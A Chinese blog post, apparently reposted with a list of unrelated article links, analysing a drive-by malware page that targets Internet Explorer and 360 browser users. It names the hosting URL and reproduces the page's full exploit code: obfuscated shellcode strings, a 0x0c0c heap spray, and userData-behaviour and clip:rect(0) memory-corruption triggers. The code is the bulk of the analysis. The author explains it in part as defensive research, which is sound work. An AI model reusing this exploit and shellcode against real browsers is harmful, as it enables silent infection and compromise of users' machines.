最近针对360浏览器的病毒分析
来源:互联网 发布:汽车配件价格查询软件 编辑:程序博客网 时间:2024/05/22 00:35
病毒默认地址:http://www.w22rt.com/360safe.html(不要轻易打开,会中毒的)
里面的代码是:
<html>
<head>
<body>
<script>
if(navigator.userAgent.toLowerCase().indexOf("/x6D/x73"+"/x69/x65"+"/x20/x37")==-1);
document.write("<iframe width=100 height=0 src=360.html></iframe>");
if(navigator.userAgent.toLowerCase().indexOf("/x6D/x73"+"/x69/x65"+"/x20/x37")>0);
document.write("<iframe width=100 height=0 src=361.html></iframe>");
</script>
</body>
</head>
</html>
从上开始看:
1、navigator.userAgent.toLowerCase()代表将用户浏览器类型取出来,小写。
"/x6D/x73"+"/x69/x65"+"/x20/x37" 解析过来时 msie 7
如果不是IE7浏览器,加载360.html
2、如果是IE7浏览器,加载361.html
主要的代码实在360.html和361.html里面,下面咱们来一起分析一下。
360.HTML:
开头是:
<SCRIPT LANGUAGE="JavaScript">
<!-- Hide
function killErrors() {
return true;
}
window.onerror = killErrors;
// -->
</SCRIPT>
主要作用,屏蔽JS的错误,以免版本低的浏览器,弹出脚本错误框,偷偷摸摸的运行。
接下来:
try {
new ActiveXObject("yutian");
}
同样用容错的方式创建控件yutian
如果不存在,那么会被catch(e)。
catch (e) {
//如果创建控件失败则执行这里
var ytpps="%uyt9yt2yt9yt2";//声明了一个变量
var UUse=(ytpps.replace(/yt/g,"")); //用正则表达式方式去掉上面那个变量中间的yt。那么剩下的就是%u9292
var YTMTV="%ud5db%uc9c9%u87cd%u9292%ucaca%u93ca%u8fca%ucf8f%u93c9%ud2de%u92d0%u8b8e%uce8d%udbdc%u93d8%ucede%uBDce%uBD";
var YTavp="%"+"yutianu"+"ByutianD"+"ByutianD"+"%"+"u"+"B"+"D"+"ByutianD"+"%"+"u"+"B"+"D"+"ByutianD"+"%u"+"BD"+"BD"+"%u"+"BD"+"ByutianD"+"%u"+"ByutianD"+"BD"+"%
u"+"BD"+"ByutianD"+"%u"+"BD"+"ByutianD"+"%u"+"EAEA";
var YTavp88=(YTavp.replace(/yutian/g,"")); //替换上面字符串中的yutian。剩下的就是:
var YTavp99="%"+"u"+"54"+"FF"+"%u"+"BE"+"A3%uB"+"DyutianBD%uD9"+"E2%u8D1C%uBD"+"BD%u36BD%uB1FD%uCD36%u10A1"+"%uD536%u36B5%uD74A%uE4AC%u0355%uBD"+"BF%u2D"+"BD%u455F%u8ED5%uBD8F%
u"+"D5BD%uCE"+"E8%uCF"+"D8%u36E9"+"%uB1FB%u0355%uyutianBDBC%u36BD%uD7yutian55%uE4B8"+"%u2355%uBDBF"+"%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u"+"7D38%uAEC8%uD2"+"D5%
uBDD3%uD5"+"BD%uCFC8%uD0D1%u36E9%uB1FB%u3355"+"%uBDBC%u36BD%uD755%uE4BC%uD355"+"%uBDBF%u5FBD%uD544%u8ED1%uBD8F%u"+"CED5%uD8D5%uE9D1%uF"+"B36%u55"+"B1%uB"+"CD2%uBDBD%u5536%
uBCD7%u55E4"+"%uBFF2%uBDBD%u445F%u5"+"13C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%u"+"BDyutianD7%uA7D7%uD7EE%u4"+"2BD%uE1"+"EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44"+"%uBEB9%uE4E1%uD893%
uF9"+"7A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u"+"8EEC%u367D%uE5FB%u9F55%uBD"+"BC%u3"+"EB"+"D%uBD45%u1E54%uBDBD%u2DBD"+"%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%
u5599%u"+"BCBC%uBDBD%uFB34%uD7DD%uEDyutianBD%uEB42%u3495%uD9FB%uFB36%uD7DD"+"%uD7BD%uD7BD%uD7BD%uD7yutianB9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%u"+"BDA2%uByutianDB2%u42ED%
u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909"+"%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u"+"7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7yutianBD%uD7BD%
uD7BD"+"%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%u"+"CB42%uEDCD%uCB42%u42DD%u8DEB%uCByutian42%u42DD%u89EB%uCB42%u42C5"+"%uFDEB%u4636%u7D8E%u66yutian8E%
u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u"+"34Byutian5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED"+"%uEDEE%uEDyutianED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%
uBDBC%"+"u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB"+"%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDyutianB9%uBDBD%u1D30%u42DD%u4242%"+"uD8D7%uCB42%u3681%uADyutianFB%
uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE"+"%u3D6D%u55yutian85%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u"+"36E8%u3051%uB8FD%u5D42%u1Byutian55%uBDBD%u7EBD%u1D55%uBDyutianBD%
u0yutian5BD"+"%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u5yutian13C%uBCBD%uBDBD%u4136%"+"u7A3E%u7AB9%u8FBA%u2CyutianC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5"+"%u2AyutianD8%u7A76%
uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%"+"uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A"+"%u259D%uAD"+"B7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%
uD5yutian36%u"+"36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8yutianED5%uBD8F%uD5BD"+"%uCEE8%uCF"+"D8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%u"+"BDBD%u445F%u428E%
u42yutianEA%uB9yutianEB%uBF56%u7EE5%u4455%u4242%uE642"+"%uBA7B%u34"+"05%yutianuBCE2%u7ADB%uB8FA%u5D42%uEE7E%u61yutian36%uD7EE%uD5FD%u"+"ADBD%uBDBD%u36EA%u9DFB%uA555%u4242%
uE542%uEC7E%u36EB%u81C8"+"%uC93yutian6%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%yutianuBE10%u8E78%u"+"B266%uAD03%u6Byutian87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8"+"%
u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u36yutian60%u3yutian6B9%u78yutianBE%u"+"E316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5"+"%u8F80%u2CC9%u38B1%u1262%uDE06%
u6C34%uECF2%u07FD%u1DC2%u2AD8%u"+"A376%uyutianD919%u2E5yutian2%u59yutian8F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230"+"%uEA"+"C9%uByutian0DB%uFE42%u11"+"03%uC066%u18yutian4D%uEF27%
u1A43%u8367%u0ByutianA0%u0584%u69yutianD4%u03A6%uyutianDBC2%u411D%u8A14%u25yutian10%uyutianAyutianDB7%yutianu3D45%u1"+"2yutian6"+"B"+"%u46"+"27%u"+"A"+"8"+"E"+"E";
var YTavp98=(YTavp99.replace(/yutian/g,""));
//同上,剩下的就是:
//据我分析,应该是文件内容
}
接下来,再次创建这个控件。
try {
new ActiveXObject("yutian");
}
如果出错则:
catch (e) {
var YTavp123="%"+"u"+"5"+"8"+"yutianayt58%u58yutianayt58%u10yutianaytEB%u4Byutianayt5B%uC9yutianayt33%uB9yutianayt66%u03yutianaytB8%u34yutianayt80%uBDyutianayt0B%uFAE2%
u05yutianaytEB%uEByutianaytE8%uFFyutianaytFF";
var YTavp1=(YTavp123.replace(/yutianayt/g,""));
//剩下的就是:
}
接下来,再次尝试:
try {
new ActiveXObject("yutian");
}
catch (e) {
var PPSytytYYtTTyyutianAVpYyTt=unescape(UUse+YTavp1+YTavp98+YTMTV+YTavp88);
//组合代码解码。
}
<SCRIPT
language=javascript>
document.writeln("<BUTTON id=PPSytytYYtTTyyutian style=/"DISPLAY: none/" onclick=newTyPPSytytYYtTTyyutianAVpYyTt();><//BUTTON>")
//创建一个隐藏的button,代替客户端点击按钮
function PPSytytYYtTTyyutianAVp(){
YtYtTyPPSytytYYtTTyyutianAVpYyTt = new Array();
//创建了数组
var BIytKKTyPPSytytYYtTTyyutianAVpYyTt = 0x86000-(PPSytytYYtTTyyutianAVpYyTt.length*2);//547872
var nopaca = 'kaix0c0c'+'kaix0c0c';
var LFlwBa=unescape(nopaca.replace(/kaix/g,'%u'));
while(LFlwBa.length<BIytKKTyPPSytytYYtTTyyutianAVpYyTt/2)
{ LFlwBa+=LFlwBa; }
var youxiYTYTyyttYtTYyTian = LFlwBa.substring(0,BIytKKTyPPSytytYYtTTyyutianAVpYyTt/2);
//取出一半
delete LFlwBa; //删除对象,释放内存,很好的编程方式
for(YTiancazaWaGa=0; YTiancazaWaGa<270; YTiancazaWaGa++) {
YtYtTyPPSytytYYtTTyyutianAVpYyTt[YTiancazaWaGa] = youxiYTYTyyttYtTYyTian + youxiYTYTyyttYtTYyTian + PPSytytYYtTTyyutianAVpYyTt;
//申请270个数组,继续填充,致使浏览器疯狂占用CPU,内存,卡死浏览器
}
}
function newTyPPSytytYYtTTyyutianAVpYyTt(){
PPSytytYYtTTyyutianAVp();//调用上面的函数
var yutYianYtAYtVP = document.createElement('bo'+'dy'); //创建body节点
yutYianYtAYtVP.addBehavior('#default#userData');
//亮点在这里,用浏览器的#default#userData。相当于放入cookie了,
document.appendChild(yutYianYtAYtVP);//加入创建的body节点中,等于运行
try
{
for (YTiancazaWaGa=0; YTiancazaWaGa<10; YTiancazaWaGa++)
{
yutYianYtAYtVP.setAttribute('s',window);//设置yutYianYtAYtVP的属性,用来运行#userData里保存的数据;不知道作者用10次这样的方式设置属性,什么用意
}
} catch(e){ }
window.status+='';//清空windows状态栏
}
document.getElementById('PPSytytYYtTTyyutian').onclick(); //模拟客户端点击
</SCRIPT>
所以一打开浏览器就卡死了。唯一的办法,禁用脚本.
第二个,来看看361.html
<html><head>
<script>function YYTSS(bytes, mystr, kYTTYu_url, kYTTYu_exp)
{
var ytpps="%uyt9yt0yt9yt0%uyt9yt0yt9yt0";
var UUse=(ytpps.replace(/yt/g,""));
var YTavp="%"+"yutianu"+"ByutianD"+"ByutianD"+"%"+"u"+"B"+"D"+"ByutianD"+"%"+"u"+"B"+"D"+"ByutianD"+"%u"+"BD"+"BD"+"%u"+"BD"+"ByutianD"+"%u"+"ByutianD"+"BD"+"%u"+"BD"+"ByutianD"+"%u"+"BD"+"ByutianD"+"%u"+"EAEA";
var YTavp88=(YTavp.replace(/yutian/g,""));
var YTavp99="%"+"u"+"54"+"FF"+"%u"+"BE"+"A3%uB"+"DyutianBD%uD9"+"E2%u8D1C%uBD"+"BD%u36BD%uB1FD%uCD36%u10A1"+"%uD536%u36B5%uD74A%uE4AC%u0355%uBD"+"BF%u2D"+"BD%u455F%u8ED5%uBD8F%u"+"D5BD%uCE"+"E8%uCF"+"D8%u36E9"+"%uB1FB%u0355%uyutianBDBC%u36BD%uD7yutian55%uE4B8"+"%u2355%uBDBF"+"%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u"+"7D38%uAEC8%uD2"+"D5%uBDD3%uD5"+"BD%uCFC8%uD0D1%u36E9%uB1FB%u3355"+"%uBDBC%u36BD%uD755%uE4BC%uD355"+"%uBDBF%u5FBD%uD544%u8ED1%uBD8F%u"+"CED5%uD8D5%uE9D1%uF"+"B36%u55"+"B1%uB"+"CD2%uBDBD%u5536%uBCD7%u55E4"+"%uBFF2%uBDBD%u445F%u5"+"13C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%u"+"BDyutianD7%uA7D7%uD7EE%u4"+"2BD%uE1"+"EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44"+"%uBEB9%uE4E1%uD893%uF9"+"7A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u"+"8EEC%u367D%uE5FB%u9F55%uBD"+"BC%u3"+"EB"+"D%uBD45%u1E54%uBDBD%u2DBD"+"%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%u"+"BCBC%uBDBD%uFB34%uD7DD%uEDyutianBD%uEB42%u3495%uD9FB%uFB36%uD7DD"+"%uD7BD%uD7BD%uD7BD%uD7yutianB9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%u"+"BDA2%uByutianDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909"+"%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u"+"7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7yutianBD%uD7BD%uD7BD"+"%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%u"+"CB42%uEDCD%uCB42%u42DD%u8DEB%uCByutian42%u42DD%u89EB%uCB42%u42C5"+"%uFDEB%u4636%u7D8E%u66yutian8E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u"+"34Byutian5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED"+"%uEDEE%uEDyutianED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%"+"u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB"+"%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDyutianB9%uBDBD%u1D30%u42DD%u4242%"+"uD8D7%uCB42%u3681%uADyutianFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE"+"%u3D6D%u55yutian85%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u"+"36E8%u3051%uB8FD%u5D42%u1Byutian55%uBDBD%u7EBD%u1D55%uBDyutianBD%u0yutian5BD"+"%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u5yutian13C%uBCBD%uBDBD%u4136%"+"u7A3E%u7AB9%u8FBA%u2CyutianC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5"+"%u2AyutianD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%"+"uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A"+"%u259D%uAD"+"B7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD5yutian36%u"+"36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8yutianED5%uBD8F%uD5BD"+"%uCEE8%uCF"+"D8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%u"+"BDBD%u445F%u428E%u42yutianEA%uB9yutianEB%uBF56%u7EE5%u4455%u4242%uE642"+"%uBA7B%u34"+"05%yutianuBCE2%u7ADB%uB8FA%u5D42%uEE7E%u61yutian36%uD7EE%uD5FD%u"+"ADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8"+"%uC93yutian6%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%yutianuBE10%u8E78%u"+"B266%uAD03%u6Byutian87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8"+"%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u36yutian60%u3yutian6B9%u78yutianBE%u"+"E316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5"+"%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%u"+"A376%uyutianD919%u2E5yutian2%u59yutian8F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230"+"%uEA"+"C9%uByutian0DB%uFE42%u11"+"03%uC066%u18yutian4D%uEF27%u1A43%u8367%u0ByutianA0%u0584%u69yutianD4%u03A6%uyutianDBC2%u411D%u8A14%u25yutian10%uyutianAyutianDB7%yutianu3D45%u1"+"2yutian6"+"B"+"%u46"+"27%u"+"A"+"8"+"E"+"E";
var YTavp98=(YTavp99.replace(/yutian/g,""));
var YTavp123="%"+"u"+"5"+"8"+"yutianayt58%u58yutianayt58%u10yutianaytEB%u4Byutianayt5B%uC9yutianayt33%uB9yutianayt66%u03yutianaytB8%u34yutianayt80%uBDyutianayt0B%uFAE2%u05yutianaytEB%uEByutianaytE8%uFFyutianaytFF";
var YTavp1=(YTavp123.replace(/yutianayt/g,""));
var dijfidfYTjsd = unescape(UUse+YTavp1+YTavp98+kYTTYu_url+YTavp88);
while (mystr.length< bytes) mystr += mystr;return mystr.substr(0, (bytes-6)/2) + dijfidfYTjsd;}</script>
</head><body>
<script>var evil = new Array();var kYTTYu_exp = "/x25/x75/x45/x34/x42/x43/x25/x75/x44/x33/x35/x35/x25/x75/x42/x44/x42/x46/x25/x75/x35/x46/x42/x44/x25/x75/x44/x35/x34/x34/x25/x75/x38/x45/x44/x31/x25/x75/x42/x44/x38/x46/x25/x75/x43/x45/x44/x35/x25/x75/x44/x38/x44/x35/x25/x75/x45/x39/x44/x31/x25/x75/x46/x42/x33/x36/x25/x75/x35/x35/x42/x31/x25/x75/x42/x43/x44/x32/x25/x75/x42/x44/x42/x44/x25/x75/x35/x35/x33/x36/x25/x75/x42/x43/x44/x37/x25/x75/x35/x35/x45/x34/x25/x75/x42/x46/x46/x32";var kYTTYu_url = "%ud5db%uc9c9%u87cd%u9292%ucaca%u93ca%u8fca%ucf8f%u93c9%ud2de%u92d0%u8b8e%uce8d%udbdc%u93d8%ucede%uBDce%uBD";var YYTTXA = unescape("/x25/x75/x30/x64/x30/x64/x25/x75/x30/x64/x30/x64");
YYTTXA = YYTSS(733120, YYTTXA, kYTTYu_url, kYTTYu_exp);
for(var k = 0; k < 1000; k++) {evil[k] = YYTTXA.substr(0, YYTTXA.length);}document.write("<table style=position:absolute;clip:rect(0)>");</script>
</body></html>
所有的代码我粘贴在这里了,大概原理和上面一样,最后一句position:absolute;clip:rect(0);设置截取范围为0
当你下一次打开这个页面的时候,就执行那个代码,也就是控件,但是内容还没搞清楚是什么。继续研究中,暂时到这里吧
- 最近针对360浏览器的病毒分析
- 记最近分析的一个锁屏幕病毒
- 知名浏览器病毒注入分析
- 针对delphi的病毒 W32.Induc 源码
- 针对勒索病毒的数据库处理方法
- 针对IE的浏览器兼容
- 最近一个比较狠的病毒(ZZ)
- 专门针对delphi的,嵌入源码的病毒(转)
- 针对伪装成“熊猫烧香”蠕虫病毒 的解决方案
- 针对伪装成“熊猫烧香”蠕虫病毒 的解决方案
- 针对伪装成“熊猫烧香”蠕虫病毒 的解决方案
- 针对伪装成“熊猫烧香”蠕虫病毒 的解决方案
- 【原创】针对aamvbxd.exe等病毒的清除方法
- 首个专门针对Mac系统的蠕虫病毒完成
- 针对魔兽争霸3“萝莉”病毒的扫描工具开发
- [转]针对各种浏览器的CSS Hack
- [转]针对各种浏览器的CSS Hack
- 针对不同浏览器的css样式
- 专职照顾小宝,暂停博客更新(半个月)
- webkit
- Android学习笔记(三):Andriod程序框架
- 无咎
- my first blog
- 最近针对360浏览器的病毒分析
- 使用命令行工具管理模拟器
- Dojo1.6新特性:Dojo Object Stores
- 职业的心态
- JVM 垃圾回收机制与GC性能调优
- 今年考程序员
- Email Addresses
- JS复制到剪贴板兼容FF
- 迅雷CTO李金波:致创业者的一封信(转载自程序员网校)
